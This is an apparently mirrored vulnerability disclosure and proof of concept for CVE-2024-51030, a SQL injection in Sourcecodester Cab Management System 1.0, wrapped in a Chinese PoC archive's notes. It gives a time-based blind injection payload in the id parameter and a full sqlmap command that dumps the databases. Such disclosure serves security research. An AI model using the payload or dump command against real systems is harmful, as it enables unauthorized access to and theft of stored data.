关联漏洞
介绍
# CVE-2024-51030
### Description
A SQL injection vulnerability in manage_client.php and view_cab.php of Sourcecodester Cab Management System 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter, leading to unauthorized access and potential compromise of sensitive data within the database.
### Vulnerability Type
SQL Injection
### Vendor of Product
Sourcecodester
### Affected Product Code Base:
https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html - 1.0
### Affected Component:
The Sourcecodester Cab Management System v1.0 is vulnerable to SQL injection through the id parameter in the manage_client.php & view_cab.php page.
### Attack Vectors:
1) Set up the application locally and login using the default provided admin credentials or you may also login using low privileged admin user like (staff).
2) Now, navigate to the following URL in your browser: http://localhost/cms/admin/?page=clients/manage_client&id=1
3) Inject SQL Payload: Modify the id parameter in the URL to include a boolean-based blind or time-based blind SQL injection payload:- http://localhost/cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%202085%20FROM%20(SELECT(SLEEP(5)))LxyK)--%20mvKJ
4) Observe the Application Response: The page should take noticeably longer (5 seconds) to load if the injection is successful, confirming that the id parameter is vulnerable to SQL injection.
5) Now use SQLMap tool for further exploitation and dumping databases using the below command: sqlmap -u "http://localhost/cms/admin/?page=clients/manage_client&id=1" -p id --dbms mysql --cookie="PHPSESSID=your_cookie" --risk 3 --level 4 --dbs --dump
### Reference:
1) https://owasp.org/www-community/attacks/SQL_Injection
2) https://portswigger.net/web-security/sql-injection
文件快照
[4.0K] /data/pocs/0e0447d4f1ad2d2bed014f3d173b8af4963b9294
└── [1.8K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。